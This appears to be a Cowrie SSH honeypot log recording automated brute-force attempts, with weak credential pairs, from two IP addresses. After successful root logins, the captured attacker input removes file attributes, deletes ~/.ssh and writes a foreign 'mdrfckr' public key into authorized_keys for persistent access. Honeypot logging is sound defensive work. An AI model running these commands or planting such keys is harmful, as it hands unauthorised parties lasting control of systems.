{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:01:36.980462Z","src_ip":"212.227.235.229","session":"2216267ee493"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:01:37.476670Z","src_ip":"212.227.235.229","session":"2216267ee493"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:01:37.477400Z","src_ip":"212.227.235.229","session":"2216267ee493"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:01:37.696909Z","src_ip":"212.227.235.229","session":"2216267ee493"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:01:37.697941Z","src_ip":"212.227.235.229","session":"2216267ee493"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37048,"dst_ip":"1.2.3.4","dst_port":22,"session":"b076a4294e11","protocol":"ssh","message":"New connection: 212.227.235.229:37048 (1.2.3.4:22) [session: b076a4294e11]","sensor":"my-vps","timestamp":"2025-08-28T16:01:37.905221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:01:37.906132Z","src_ip":"212.227.235.229","session":"b076a4294e11"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:01:38.119670Z","src_ip":"212.227.235.229","session":"b076a4294e11"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:01:39.017065Z","src_ip":"212.227.235.229","session":"b076a4294e11"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:01:40.234458Z","src_ip":"212.227.235.229","session":"b076a4294e11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38034,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ba5a57a0be0","protocol":"ssh","message":"New connection: 212.227.235.229:38034 (1.2.3.4:22) [session: 2ba5a57a0be0]","sensor":"my-vps","timestamp":"2025-08-28T16:01:40.468486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:01:40.469332Z","src_ip":"212.227.235.229","session":"2ba5a57a0be0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:01:40.693973Z","src_ip":"212.227.235.229","session":"2ba5a57a0be0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:01:41.632730Z","src_ip":"212.227.235.229","session":"2ba5a57a0be0"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:01:41.852123Z","src_ip":"212.227.235.229","session":"2216267ee493"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:01:41.858488Z","src_ip":"212.227.235.229","session":"2ba5a57a0be0"}
{"eventid":"cowrie.session.closed","duration":30.51252508163452,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:01:45.145979Z","src_ip":"119.28.118.184","session":"2caeb568ce14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49320,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c297f547f33","protocol":"ssh","message":"New connection: 212.227.235.229:49320 (1.2.3.4:22) [session: 5c297f547f33]","sensor":"my-vps","timestamp":"2025-08-28T16:01:48.534084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:01:48.535355Z","src_ip":"212.227.235.229","session":"5c297f547f33"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:01:48.740327Z","src_ip":"212.227.235.229","session":"5c297f547f33"}
{"eventid":"cowrie.login.failed","username":"ian","password":"ian","message":"login attempt [ian/ian] failed","sensor":"my-vps","timestamp":"2025-08-28T16:01:49.569051Z","src_ip":"212.227.235.229","session":"5c297f547f33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42310,"dst_ip":"1.2.3.4","dst_port":22,"session":"79222501d04f","protocol":"ssh","message":"New connection: 212.227.125.160:42310 (1.2.3.4:22) [session: 79222501d04f]","sensor":"my-vps","timestamp":"2025-08-28T16:01:50.240437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:01:50.241393Z","src_ip":"212.227.125.160","session":"79222501d04f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:01:50.290946Z","src_ip":"212.227.125.160","session":"79222501d04f"}
{"eventid":"cowrie.login.failed","username":"solv","password":"12345678","message":"login attempt [solv/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T16:01:50.442402Z","src_ip":"212.227.125.160","session":"79222501d04f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:01:50.776854Z","src_ip":"212.227.235.229","session":"5c297f547f33"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:01:51.494240Z","src_ip":"212.227.125.160","session":"79222501d04f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38018,"dst_ip":"1.2.3.4","dst_port":22,"session":"def71d30c3d3","protocol":"ssh","message":"New connection: 212.227.235.229:38018 (1.2.3.4:22) [session: def71d30c3d3]","sensor":"my-vps","timestamp":"2025-08-28T16:01:52.376249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:01:52.377206Z","src_ip":"212.227.235.229","session":"def71d30c3d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:01:52.684885Z","src_ip":"212.227.235.229","session":"def71d30c3d3"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"pass1234","message":"login attempt [oracle/pass1234] failed","sensor":"my-vps","timestamp":"2025-08-28T16:01:53.950610Z","src_ip":"212.227.235.229","session":"def71d30c3d3"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:01:55.264750Z","src_ip":"212.227.235.229","session":"def71d30c3d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33036,"dst_ip":"1.2.3.4","dst_port":22,"session":"44ee44591f7a","protocol":"ssh","message":"New connection: 212.227.235.229:33036 (1.2.3.4:22) [session: 44ee44591f7a]","sensor":"my-vps","timestamp":"2025-08-28T16:02:45.516715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:02:45.517373Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:02:45.728793Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.login.success","username":"root","password":"Root123456@","message":"login attempt [root/Root123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:02:46.615527Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:02:47.057844Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:02:47.058651Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:02:47.060127Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:02:47.272557Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:02:48.172574Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:02:48.173459Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:02:48.386245Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:02:48.387293Z","src_ip":"212.227.235.229","session":"44ee44591f7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34148,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e680f6127b0","protocol":"ssh","message":"New connection: 212.227.235.229:34148 (1.2.3.4:22) [session: 4e680f6127b0]","sensor":"my-vps","timestamp":"2025-08-28T16:02:48.644337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:02:48.645321Z","src_ip":"212.227.235.229","session":"4e680f6127b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:02:48.886426Z","src_ip":"212.227.235.229","session":"4e680f6127b0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:02:49.890414Z","src_ip":"212.227.235.229","session":"4e680f6127b0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:02:51.134861Z","src_ip":"212.227.235.229","session":"4e680f6127b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35138,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a1e0cf059b9","protocol":"ssh","message":"New connection: 212.227.235.229:35138 (1.2.3.4:22) [session: 9a1e0cf059b9]","sensor":"my-vps","timestamp":"2025-08-28T16:02:51.354552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:02:51.355839Z","src_ip":"212.227.235.229","session":"9a1e0cf059b9"}
